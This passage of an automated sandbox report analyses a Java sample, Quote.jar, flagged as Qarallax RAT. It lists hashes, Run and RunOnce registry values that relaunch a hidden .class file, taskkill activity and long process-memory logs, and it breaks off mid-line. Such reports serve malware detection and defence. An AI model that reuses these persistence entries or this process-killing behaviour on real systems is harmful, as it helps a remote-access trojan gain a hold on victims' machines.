Analysis
-
max time kernel
153s -
max time network
157s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
19-08-2020 14:11
Static task
static1
Behavioral task
behavioral1
Sample
Quote.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Quote.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Quote.jar
-
Size
399KB
-
MD5
59444630bce44b4d60b0ff8363c5164e
-
SHA1
03fa6c6f567e8a4777348d3f8a21bfc9fe2ae1f9
-
SHA256
4fbba6984bfcc915b229aca31711fbbbbf17883782028b72b9a080d48cd6bb87
-
SHA512
5d9abfa3a9a52dc9a68ab3e96d297389d391b4a2d30094cb4fce8cb473b52825c20c432d4e8dab91050f1dffff7630c8670337445f9b5ad6968b87c25dc5d545
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001353c-7.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 112 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created C:\Users\Admin\FVKwo\Desktop.ini java.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\iPhDc java.exe File opened for modification C:\Windows\System32\iPhDc java.exe -
Kills process with taskkill 16 IoCs
pid Process 1672 taskkill.exe 1608 taskkill.exe 1600 taskkill.exe 676 taskkill.exe 1860 taskkill.exe 1880 taskkill.exe 1244 taskkill.exe 1752 taskkill.exe 1776 taskkill.exe 1488 taskkill.exe 1044 taskkill.exe 1600 taskkill.exe 684 taskkill.exe 300 taskkill.exe 828 taskkill.exe 676 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1072 powershell.exe 1072 powershell.exe -
Suspicious use of AdjustPrivilegeToken 97 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1364 WMIC.exe Token: SeSecurityPrivilege 1364 WMIC.exe Token: SeTakeOwnershipPrivilege 1364 WMIC.exe Token: SeLoadDriverPrivilege 1364 WMIC.exe Token: SeSystemProfilePrivilege 1364 WMIC.exe Token: SeSystemtimePrivilege 1364 WMIC.exe Token: SeProfSingleProcessPrivilege 1364 WMIC.exe Token: SeIncBasePriorityPrivilege 1364 WMIC.exe Token: SeCreatePagefilePrivilege 1364 WMIC.exe Token: SeBackupPrivilege 1364 WMIC.exe Token: SeRestorePrivilege 1364 WMIC.exe Token: SeShutdownPrivilege 1364 WMIC.exe Token: SeDebugPrivilege 1364 WMIC.exe Token: SeSystemEnvironmentPrivilege 1364 WMIC.exe Token: SeRemoteShutdownPrivilege 1364 WMIC.exe Token: SeUndockPrivilege 1364 WMIC.exe Token: SeManageVolumePrivilege 1364 WMIC.exe Token: 33 1364 WMIC.exe Token: 34 1364 WMIC.exe Token: 35 1364 WMIC.exe Token: SeIncreaseQuotaPrivilege 1364 WMIC.exe Token: SeSecurityPrivilege 1364 WMIC.exe Token: SeTakeOwnershipPrivilege 1364 WMIC.exe Token: SeLoadDriverPrivilege 1364 WMIC.exe Token: SeSystemProfilePrivilege 1364 WMIC.exe Token: SeSystemtimePrivilege 1364 WMIC.exe Token: SeProfSingleProcessPrivilege 1364 WMIC.exe Token: SeIncBasePriorityPrivilege 1364 WMIC.exe Token: SeCreatePagefilePrivilege 1364 WMIC.exe Token: SeBackupPrivilege 1364 WMIC.exe Token: SeRestorePrivilege 1364 WMIC.exe Token: SeShutdownPrivilege 1364 WMIC.exe Token: SeDebugPrivilege 1364 WMIC.exe Token: SeSystemEnvironmentPrivilege 1364 WMIC.exe Token: SeRemoteShutdownPrivilege 1364 WMIC.exe Token: SeUndockPrivilege 1364 WMIC.exe Token: SeManageVolumePrivilege 1364 WMIC.exe Token: 33 1364 WMIC.exe Token: 34 1364 WMIC.exe Token: 35 1364 WMIC.exe Token: SeDebugPrivilege 828 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 676 taskkill.exe Token: SeDebugPrivilege 1044 taskkill.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 684 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 300 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 676 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 112 java.exe -
Suspicious use of WriteProcessMemory 753 IoCs
description pid Process procid_target PID 112 wrote to memory of 1660 112 java.exe 25 PID 112 wrote to memory of 1660 112 java.exe 25 PID 112 wrote to memory of 1660 112 java.exe 25 PID 112 wrote to memory of 1300 112 java.exe 26 PID 112 wrote to memory of 1300 112 java.exe 26 PID 112 wrote to memory of 1300 112 java.exe 26 PID 1300 wrote to memory of 1772 1300 cmd.exe 27 PID 1300 wrote to memory of 1772 1300 cmd.exe 27 PID 1300 wrote to memory of 1772 1300 cmd.exe 27 PID 112 wrote to memory of 1844 112 java.exe 28 PID 112 wrote to memory of 1844 112 java.exe 28 PID 112 wrote to memory of 1844 112 java.exe 28 PID 1844 wrote to memory of 1364 1844 cmd.exe 29 PID 1844 wrote to memory of 1364 1844 cmd.exe 29 PID 1844 wrote to memory of 1364 1844 cmd.exe 29 PID 112 wrote to memory of 1576 112 java.exe 32 PID 112 wrote to memory of 1576 112 java.exe 32 PID 112 wrote to memory of 1576 112 java.exe 32 PID 112 wrote to memory of 1608 112 java.exe 33 PID 112 wrote to memory of 1608 112 java.exe 33 PID 112 wrote to memory of 1608 112 java.exe 33 PID 112 wrote to memory of 1956 112 java.exe 34 PID 112 wrote to memory of 1956 112 java.exe 34 PID 112 wrote to memory of 1956 112 java.exe 34 PID 112 wrote to memory of 1152 112 java.exe 35 PID 112 wrote to memory of 1152 112 java.exe 35 PID 112 wrote to memory of 1152 112 java.exe 35 PID 112 wrote to memory of 2036 112 java.exe 36 PID 112 wrote to memory of 2036 112 java.exe 36 PID 112 wrote to memory of 2036 112 java.exe 36 PID 112 wrote to memory of 2040 112 java.exe 37 PID 112 wrote to memory of 2040 112 java.exe 37 PID 112 wrote to memory of 2040 112 java.exe 37 PID 112 wrote to memory of 2020 112 java.exe 38 PID 112 wrote to memory of 2020 112 java.exe 38 PID 112 wrote to memory of 2020 112 java.exe 38 PID 112 wrote to memory of 528 112 java.exe 39 PID 112 wrote to memory of 528 112 java.exe 39 PID 112 wrote to memory of 528 112 java.exe 39 PID 112 wrote to memory of 872 112 java.exe 40 PID 112 wrote to memory of 872 112 java.exe 40 PID 112 wrote to memory of 872 112 java.exe 40 PID 112 wrote to memory of 1176 112 java.exe 41 PID 112 wrote to memory of 1176 112 java.exe 41 PID 112 wrote to memory of 1176 112 java.exe 41 PID 112 wrote to memory of 1072 112 java.exe 42 PID 112 wrote to memory of 1072 112 java.exe 42 PID 112 wrote to memory of 1072 112 java.exe 42 PID 112 wrote to memory of 828 112 java.exe 43 PID 112 wrote to memory of 828 112 java.exe 43 PID 112 wrote to memory of 828 112 java.exe 43 PID 112 wrote to memory of 1472 112 java.exe 44 PID 112 wrote to memory of 1472 112 java.exe 44 PID 112 wrote to memory of 1472 112 java.exe 44 PID 112 wrote to memory of 1188 112 java.exe 45 PID 112 wrote to memory of 1188 112 java.exe 45 PID 112 wrote to memory of 1188 112 java.exe 45 PID 872 wrote to memory of 460 872 cmd.exe 48 PID 872 wrote to memory of 460 872 cmd.exe 48 PID 872 wrote to memory of 460 872 cmd.exe 48 PID 112 wrote to memory of 1544 112 java.exe 49 PID 112 wrote to memory of 1544 112 java.exe 49 PID 112 wrote to memory of 1544 112 java.exe 49 PID 112 wrote to memory of 812 112 java.exe 50 PID 112 wrote to memory of 812 112 java.exe 50 PID 112 wrote to memory of 812 112 java.exe 50 PID 112 wrote to memory of 1012 112 java.exe 51 PID 112 wrote to memory of 1012 112 java.exe 51 PID 112 wrote to memory of 1012 112 java.exe 51 PID 112 wrote to memory of 1464 112 java.exe 52 PID 112 wrote to memory of 1464 112 java.exe 52 PID 112 wrote to memory of 1464 112 java.exe 52 PID 112 wrote to memory of 1764 112 java.exe 55 PID 112 wrote to memory of 1764 112 java.exe 55 PID 112 wrote to memory of 1764 112 java.exe 55 PID 112 wrote to memory of 1836 112 java.exe 57 PID 112 wrote to memory of 1836 112 java.exe 57 PID 112 wrote to memory of 1836 112 java.exe 57 PID 112 wrote to memory of 1892 112 java.exe 60 PID 112 wrote to memory of 1892 112 java.exe 60 PID 112 wrote to memory of 1892 112 java.exe 60 PID 112 wrote to memory of 1604 112 java.exe 63 PID 112 wrote to memory of 1604 112 java.exe 63 PID 112 wrote to memory of 1604 112 java.exe 63 PID 872 wrote to memory of 1480 872 cmd.exe 67 PID 872 wrote to memory of 1480 872 cmd.exe 67 PID 872 wrote to memory of 1480 872 cmd.exe 67 PID 112 wrote to memory of 1396 112 java.exe 69 PID 112 wrote to memory of 1396 112 java.exe 69 PID 112 wrote to memory of 1396 112 java.exe 69 PID 112 wrote to memory of 1492 112 java.exe 71 PID 112 wrote to memory of 1492 112 java.exe 71 PID 112 wrote to memory of 1492 112 java.exe 71 PID 112 wrote to memory of 1776 112 java.exe 72 PID 112 wrote to memory of 1776 112 java.exe 72 PID 112 wrote to memory of 1776 112 java.exe 72 PID 1776 wrote to memory of 1744 1776 cmd.exe 73 PID 1776 wrote to memory of 1744 1776 cmd.exe 73 PID 1776 wrote to memory of 1744 1776 cmd.exe 73 PID 112 wrote to memory of 1368 112 java.exe 75 PID 112 wrote to memory of 1368 112 java.exe 75 PID 112 wrote to memory of 1368 112 java.exe 75 PID 112 wrote to memory of 1752 112 java.exe 76 PID 112 wrote to memory of 1752 112 java.exe 76 PID 112 wrote to memory of 1752 112 java.exe 76 PID 112 wrote to memory of 992 112 java.exe 78 PID 112 wrote to memory of 992 112 java.exe 78 PID 112 wrote to memory of 992 112 java.exe 78 PID 1776 wrote to memory of 1240 1776 cmd.exe 79 PID 1776 wrote to memory of 1240 1776 cmd.exe 79 PID 1776 wrote to memory of 1240 1776 cmd.exe 79 PID 112 wrote to memory of 1864 112 java.exe 81 PID 112 wrote to memory of 1864 112 java.exe 81 PID 112 wrote to memory of 1864 112 java.exe 81 PID 112 wrote to memory of 2044 112 java.exe 84 PID 112 wrote to memory of 2044 112 java.exe 84 PID 112 wrote to memory of 2044 112 java.exe 84 PID 112 wrote to memory of 1408 112 java.exe 86 PID 112 wrote to memory of 1408 112 java.exe 86 PID 112 wrote to memory of 1408 112 java.exe 86 PID 112 wrote to memory of 1372 112 java.exe 88 PID 112 wrote to memory of 1372 112 java.exe 88 PID 112 wrote to memory of 1372 112 java.exe 88 PID 112 wrote to memory of 1860 112 java.exe 89 PID 112 wrote to memory of 1860 112 java.exe 89 PID 112 wrote to memory of 1860 112 java.exe 89 PID 1372 wrote to memory of 1884 1372 cmd.exe 90 PID 1372 wrote to memory of 1884 1372 cmd.exe 90 PID 1372 wrote to memory of 1884 1372 cmd.exe 90 PID 112 wrote to memory of 300 112 java.exe 91 PID 112 wrote to memory of 300 112 java.exe 91 PID 112 wrote to memory of 300 112 java.exe 91 PID 1372 wrote to memory of 1908 1372 cmd.exe 92 PID 1372 wrote to memory of 1908 1372 cmd.exe 92 PID 1372 wrote to memory of 1908 1372 cmd.exe 92 PID 112 wrote to memory of 1604 112 java.exe 95 PID 112 wrote to memory of 1604 112 java.exe 95 PID 112 wrote to memory of 1604 112 java.exe 95 PID 1604 wrote to memory of 1964 1604 cmd.exe 96 PID 1604 wrote to memory of 1964 1604 cmd.exe 96 PID 1604 wrote to memory of 1964 1604 cmd.exe 96 PID 112 wrote to memory of 676 112 java.exe 97 PID 112 wrote to memory of 676 112 java.exe 97 PID 112 wrote to memory of 676 112 java.exe 97 PID 1604 wrote to memory of 1608 1604 cmd.exe 99 PID 1604 wrote to memory of 1608 1604 cmd.exe 99 PID 1604 wrote to memory of 1608 1604 cmd.exe 99 PID 112 wrote to memory of 1688 112 java.exe 100 PID 112 wrote to memory of 1688 112 java.exe 100 PID 112 wrote to memory of 1688 112 java.exe 100 PID 1688 wrote to memory of 1736 1688 cmd.exe 101 PID 1688 wrote to memory of 1736 1688 cmd.exe 101 PID 1688 wrote to memory of 1736 1688 cmd.exe 101 PID 1688 wrote to memory of 1852 1688 cmd.exe 102 PID 1688 wrote to memory of 1852 1688 cmd.exe 102 PID 1688 wrote to memory of 1852 1688 cmd.exe 102 PID 112 wrote to memory of 1880 112 java.exe 103 PID 112 wrote to memory of 1880 112 java.exe 103 PID 112 wrote to memory of 1880 112 java.exe 103 PID 1880 wrote to memory of 1244 1880 cmd.exe 104 PID 1880 wrote to memory of 1244 1880 cmd.exe 104 PID 1880 wrote to memory of 1244 1880 cmd.exe 104 PID 1880 wrote to memory of 1872 1880 cmd.exe 105 PID 1880 wrote to memory of 1872 1880 cmd.exe 105 PID 1880 wrote to memory of 1872 1880 cmd.exe 105 PID 112 wrote to memory of 1120 112 java.exe 107 PID 112 wrote to memory of 1120 112 java.exe 107 PID 112 wrote to memory of 1120 112 java.exe 107 PID 1120 wrote to memory of 1172 1120 cmd.exe 108 PID 1120 wrote to memory of 1172 1120 cmd.exe 108 PID 1120 wrote to memory of 1172 1120 cmd.exe 108 PID 1120 wrote to memory of 1508 1120 cmd.exe 109 PID 1120 wrote to memory of 1508 1120 cmd.exe 109 PID 1120 wrote to memory of 1508 1120 cmd.exe 109 PID 112 wrote to memory of 1512 112 java.exe 110 PID 112 wrote to memory of 1512 112 java.exe 110 PID 112 wrote to memory of 1512 112 java.exe 110 PID 1512 wrote to memory of 1772 1512 cmd.exe 111 PID 1512 wrote to memory of 1772 1512 cmd.exe 111 PID 1512 wrote to memory of 1772 1512 cmd.exe 111 PID 1512 wrote to memory of 1568 1512 cmd.exe 112 PID 1512 wrote to memory of 1568 1512 cmd.exe 112 PID 1512 wrote to memory of 1568 1512 cmd.exe 112 PID 112 wrote to memory of 1392 112 java.exe 113 PID 112 wrote to memory of 1392 112 java.exe 113 PID 112 wrote to memory of 1392 112 java.exe 113 PID 1392 wrote to memory of 832 1392 cmd.exe 114 PID 1392 wrote to memory of 832 1392 cmd.exe 114 PID 1392 wrote to memory of 832 1392 cmd.exe 114 PID 112 wrote to memory of 1044 112 java.exe 115 PID 112 wrote to memory of 1044 112 java.exe 115 PID 112 wrote to memory of 1044 112 java.exe 115 PID 1392 wrote to memory of 1836 1392 cmd.exe 117 PID 1392 wrote to memory of 1836 1392 cmd.exe 117 PID 1392 wrote to memory of 1836 1392 cmd.exe 117 PID 112 wrote to memory of 1400 112 java.exe 118 PID 112 wrote to memory of 1400 112 java.exe 118 PID 112 wrote to memory of 1400 112 java.exe 118 PID 1400 wrote to memory of 1892 1400 cmd.exe 119 PID 1400 wrote to memory of 1892 1400 cmd.exe 119 PID 1400 wrote to memory of 1892 1400 cmd.exe 119 PID 1400 wrote to memory of 1412 1400 cmd.exe 120 PID 1400 wrote to memory of 1412 1400 cmd.exe 120 PID 1400 wrote to memory of 1412 1400 cmd.exe 120 PID 112 wrote to memory of 1608 112 java.exe 121 PID 112 wrote to memory of 1608 112 java.exe 121 PID 112 wrote to memory of 1608 112 java.exe 121 PID 1608 wrote to memory of 1936 1608 cmd.exe 122 PID 1608 wrote to memory of 1936 1608 cmd.exe 122 PID 1608 wrote to memory of 1936 1608 cmd.exe 122 PID 1608 wrote to memory of 1556 1608 cmd.exe 123 PID 1608 wrote to memory of 1556 1608 cmd.exe 123 PID 1608 wrote to memory of 1556 1608 cmd.exe 123 PID 112 wrote to memory of 1492 112 java.exe 124 PID 112 wrote to memory of 1492 112 java.exe 124 PID 112 wrote to memory of 1492 112 java.exe 124 PID 1492 wrote to memory of 992 1492 cmd.exe 125 PID 1492 wrote to memory of 992 1492 cmd.exe 125 PID 1492 wrote to memory of 992 1492 cmd.exe 125 PID 1492 wrote to memory of 1172 1492 cmd.exe 126 PID 1492 wrote to memory of 1172 1492 cmd.exe 126 PID 1492 wrote to memory of 1172 1492 cmd.exe 126 PID 112 wrote to memory of 2016 112 java.exe 127 PID 112 wrote to memory of 2016 112 java.exe 127 PID 112 wrote to memory of 2016 112 java.exe 127 PID 2016 wrote to memory of 1748 2016 cmd.exe 128 PID 2016 wrote to memory of 1748 2016 cmd.exe 128 PID 2016 wrote to memory of 1748 2016 cmd.exe 128 PID 2016 wrote to memory of 1472 2016 cmd.exe 129 PID 2016 wrote to memory of 1472 2016 cmd.exe 129 PID 2016 wrote to memory of 1472 2016 cmd.exe 129 PID 112 wrote to memory of 832 112 java.exe 130 PID 112 wrote to memory of 832 112 java.exe 130 PID 112 wrote to memory of 832 112 java.exe 130 PID 832 wrote to memory of 1876 832 cmd.exe 131 PID 832 wrote to memory of 1876 832 cmd.exe 131 PID 832 wrote to memory of 1876 832 cmd.exe 131 PID 112 wrote to memory of 684 112 java.exe 132 PID 112 wrote to memory of 684 112 java.exe 132 PID 112 wrote to memory of 684 112 java.exe 132 PID 832 wrote to memory of 1852 832 cmd.exe 134 PID 832 wrote to memory of 1852 832 cmd.exe 134 PID 832 wrote to memory of 1852 832 cmd.exe 134 PID 112 wrote to memory of 1368 112 java.exe 135 PID 112 wrote to memory of 1368 112 java.exe 135 PID 112 wrote to memory of 1368 112 java.exe 135 PID 1368 wrote to memory of 1172 1368 cmd.exe 136 PID 1368 wrote to memory of 1172 1368 cmd.exe 136 PID 1368 wrote to memory of 1172 1368 cmd.exe 136 PID 1368 wrote to memory of 1408 1368 cmd.exe 137 PID 1368 wrote to memory of 1408 1368 cmd.exe 137 PID 1368 wrote to memory of 1408 1368 cmd.exe 137 PID 112 wrote to memory of 1836 112 java.exe 138 PID 112 wrote to memory of 1836 112 java.exe 138 PID 112 wrote to memory of 1836 112 java.exe 138 PID 1836 wrote to memory of 1840 1836 cmd.exe 139 PID 1836 wrote to memory of 1840 1836 cmd.exe 139 PID 1836 wrote to memory of 1840 1836 cmd.exe 139 PID 1836 wrote to memory of 1884 1836 cmd.exe 140 PID 1836 wrote to memory of 1884 1836 cmd.exe 140 PID 1836 wrote to memory of 1884 1836 cmd.exe 140 PID 112 wrote to memory of 764 112 java.exe 141 PID 112 wrote to memory of 764 112 java.exe 141 PID 112 wrote to memory of 764 112 java.exe 141 PID 764 wrote to memory of 1604 764 cmd.exe 142 PID 764 wrote to memory of 1604 764 cmd.exe 142 PID 764 wrote to memory of 1604 764 cmd.exe 142 PID 764 wrote to memory of 1516 764 cmd.exe 143 PID 764 wrote to memory of 1516 764 cmd.exe 143 PID 764 wrote to memory of 1516 764 cmd.exe 143 PID 112 wrote to memory of 1472 112 java.exe 144 PID 112 wrote to memory of 1472 112 java.exe 144 PID 112 wrote to memory of 1472 112 java.exe 144 PID 1472 wrote to memory of 300 1472 cmd.exe 145 PID 1472 wrote to memory of 300 1472 cmd.exe 145 PID 1472 wrote to memory of 300 1472 cmd.exe 145 PID 112 wrote to memory of 1776 112 java.exe 146 PID 112 wrote to memory of 1776 112 java.exe 146 PID 112 wrote to memory of 1776 112 java.exe 146 PID 1472 wrote to memory of 812 1472 cmd.exe 147 PID 1472 wrote to memory of 812 1472 cmd.exe 147 PID 1472 wrote to memory of 812 1472 cmd.exe 147 PID 112 wrote to memory of 676 112 java.exe 149 PID 112 wrote to memory of 676 112 java.exe 149 PID 112 wrote to memory of 676 112 java.exe 149 PID 676 wrote to memory of 1740 676 cmd.exe 150 PID 676 wrote to memory of 1740 676 cmd.exe 150 PID 676 wrote to memory of 1740 676 cmd.exe 150 PID 676 wrote to memory of 2008 676 cmd.exe 151 PID 676 wrote to memory of 2008 676 cmd.exe 151 PID 676 wrote to memory of 2008 676 cmd.exe 151 PID 112 wrote to memory of 1380 112 java.exe 152 PID 112 wrote to memory of 1380 112 java.exe 152 PID 112 wrote to memory of 1380 112 java.exe 152 PID 1380 wrote to memory of 1128 1380 cmd.exe 153 PID 1380 wrote to memory of 1128 1380 cmd.exe 153 PID 1380 wrote to memory of 1128 1380 cmd.exe 153 PID 1380 wrote to memory of 1176 1380 cmd.exe 154 PID 1380 wrote to memory of 1176 1380 cmd.exe 154 PID 1380 wrote to memory of 1176 1380 cmd.exe 154 PID 112 wrote to memory of 2020 112 java.exe 155 PID 112 wrote to memory of 2020 112 java.exe 155 PID 112 wrote to memory of 2020 112 java.exe 155 PID 2020 wrote to memory of 2040 2020 cmd.exe 156 PID 2020 wrote to memory of 2040 2020 cmd.exe 156 PID 2020 wrote to memory of 2040 2020 cmd.exe 156 PID 112 wrote to memory of 1600 112 java.exe 157 PID 112 wrote to memory of 1600 112 java.exe 157 PID 112 wrote to memory of 1600 112 java.exe 157 PID 2020 wrote to memory of 1876 2020 cmd.exe 159 PID 2020 wrote to memory of 1876 2020 cmd.exe 159 PID 2020 wrote to memory of 1876 2020 cmd.exe 159 PID 112 wrote to memory of 2032 112 java.exe 160 PID 112 wrote to memory of 2032 112 java.exe 160 PID 112 wrote to memory of 2032 112 java.exe 160 PID 2032 wrote to memory of 1748 2032 cmd.exe 161 PID 2032 wrote to memory of 1748 2032 cmd.exe 161 PID 2032 wrote to memory of 1748 2032 cmd.exe 161 PID 2032 wrote to memory of 2028 2032 cmd.exe 162 PID 2032 wrote to memory of 2028 2032 cmd.exe 162 PID 2032 wrote to memory of 2028 2032 cmd.exe 162 PID 112 wrote to memory of 1392 112 java.exe 163 PID 112 wrote to memory of 1392 112 java.exe 163 PID 112 wrote to memory of 1392 112 java.exe 163 PID 1392 wrote to memory of 1120 1392 cmd.exe 164 PID 1392 wrote to memory of 1120 1392 cmd.exe 164 PID 1392 wrote to memory of 1120 1392 cmd.exe 164 PID 1392 wrote to memory of 1436 1392 cmd.exe 165 PID 1392 wrote to memory of 1436 1392 cmd.exe 165 PID 1392 wrote to memory of 1436 1392 cmd.exe 165 PID 112 wrote to memory of 1468 112 java.exe 166 PID 112 wrote to memory of 1468 112 java.exe 166 PID 112 wrote to memory of 1468 112 java.exe 166 PID 1468 wrote to memory of 1680 1468 cmd.exe 167 PID 1468 wrote to memory of 1680 1468 cmd.exe 167 PID 1468 wrote to memory of 1680 1468 cmd.exe 167 PID 1468 wrote to memory of 1400 1468 cmd.exe 168 PID 1468 wrote to memory of 1400 1468 cmd.exe 168 PID 1468 wrote to memory of 1400 1468 cmd.exe 168 PID 112 wrote to memory of 1688 112 java.exe 169 PID 112 wrote to memory of 1688 112 java.exe 169 PID 112 wrote to memory of 1688 112 java.exe 169 PID 112 wrote to memory of 300 112 java.exe 170 PID 112 wrote to memory of 300 112 java.exe 170 PID 112 wrote to memory of 300 112 java.exe 170 PID 1688 wrote to memory of 812 1688 cmd.exe 171 PID 1688 wrote to memory of 812 1688 cmd.exe 171 PID 1688 wrote to memory of 812 1688 cmd.exe 171 PID 1688 wrote to memory of 2008 1688 cmd.exe 173 PID 1688 wrote to memory of 2008 1688 cmd.exe 173 PID 1688 wrote to memory of 2008 1688 cmd.exe 173 PID 112 wrote to memory of 1188 112 java.exe 174 PID 112 wrote to memory of 1188 112 java.exe 174 PID 112 wrote to memory of 1188 112 java.exe 174 PID 1188 wrote to memory of 1752 1188 cmd.exe 175 PID 1188 wrote to memory of 1752 1188 cmd.exe 175 PID 1188 wrote to memory of 1752 1188 cmd.exe 175 PID 1188 wrote to memory of 1012 1188 cmd.exe 176 PID 1188 wrote to memory of 1012 1188 cmd.exe 176 PID 1188 wrote to memory of 1012 1188 cmd.exe 176 PID 112 wrote to memory of 844 112 java.exe 177 PID 112 wrote to memory of 844 112 java.exe 177 PID 112 wrote to memory of 844 112 java.exe 177 PID 844 wrote to memory of 2036 844 cmd.exe 178 PID 844 wrote to memory of 2036 844 cmd.exe 178 PID 844 wrote to memory of 2036 844 cmd.exe 178 PID 844 wrote to memory of 1852 844 cmd.exe 179 PID 844 wrote to memory of 1852 844 cmd.exe 179 PID 844 wrote to memory of 1852 844 cmd.exe 179 PID 112 wrote to memory of 1876 112 java.exe 180 PID 112 wrote to memory of 1876 112 java.exe 180 PID 112 wrote to memory of 1876 112 java.exe 180 PID 1876 wrote to memory of 1748 1876 cmd.exe 181 PID 1876 wrote to memory of 1748 1876 cmd.exe 181 PID 1876 wrote to memory of 1748 1876 cmd.exe 181 PID 1876 wrote to memory of 2028 1876 cmd.exe 182 PID 1876 wrote to memory of 2028 1876 cmd.exe 182 PID 1876 wrote to memory of 2028 1876 cmd.exe 182 PID 112 wrote to memory of 1604 112 java.exe 183 PID 112 wrote to memory of 1604 112 java.exe 183 PID 112 wrote to memory of 1604 112 java.exe 183 PID 1604 wrote to memory of 1464 1604 cmd.exe 184 PID 1604 wrote to memory of 1464 1604 cmd.exe 184 PID 1604 wrote to memory of 1464 1604 cmd.exe 184 PID 1604 wrote to memory of 1672 1604 cmd.exe 185 PID 1604 wrote to memory of 1672 1604 cmd.exe 185 PID 1604 wrote to memory of 1672 1604 cmd.exe 185 PID 112 wrote to memory of 1860 112 java.exe 186 PID 112 wrote to memory of 1860 112 java.exe 186 PID 112 wrote to memory of 1860 112 java.exe 186 PID 112 wrote to memory of 684 112 java.exe 187 PID 112 wrote to memory of 684 112 java.exe 187 PID 112 wrote to memory of 684 112 java.exe 187 PID 684 wrote to memory of 872 684 cmd.exe 189 PID 684 wrote to memory of 872 684 cmd.exe 189 PID 684 wrote to memory of 872 684 cmd.exe 189 PID 684 wrote to memory of 2016 684 cmd.exe 190 PID 684 wrote to memory of 2016 684 cmd.exe 190 PID 684 wrote to memory of 2016 684 cmd.exe 190 PID 112 wrote to memory of 1368 112 java.exe 191 PID 112 wrote to memory of 1368 112 java.exe 191 PID 112 wrote to memory of 1368 112 java.exe 191 PID 1368 wrote to memory of 1880 1368 cmd.exe 192 PID 1368 wrote to memory of 1880 1368 cmd.exe 192 PID 1368 wrote to memory of 1880 1368 cmd.exe 192 PID 1368 wrote to memory of 1380 1368 cmd.exe 193 PID 1368 wrote to memory of 1380 1368 cmd.exe 193 PID 1368 wrote to memory of 1380 1368 cmd.exe 193 PID 112 wrote to memory of 1476 112 java.exe 194 PID 112 wrote to memory of 1476 112 java.exe 194 PID 112 wrote to memory of 1476 112 java.exe 194 PID 1476 wrote to memory of 1152 1476 cmd.exe 195 PID 1476 wrote to memory of 1152 1476 cmd.exe 195 PID 1476 wrote to memory of 1152 1476 cmd.exe 195 PID 1476 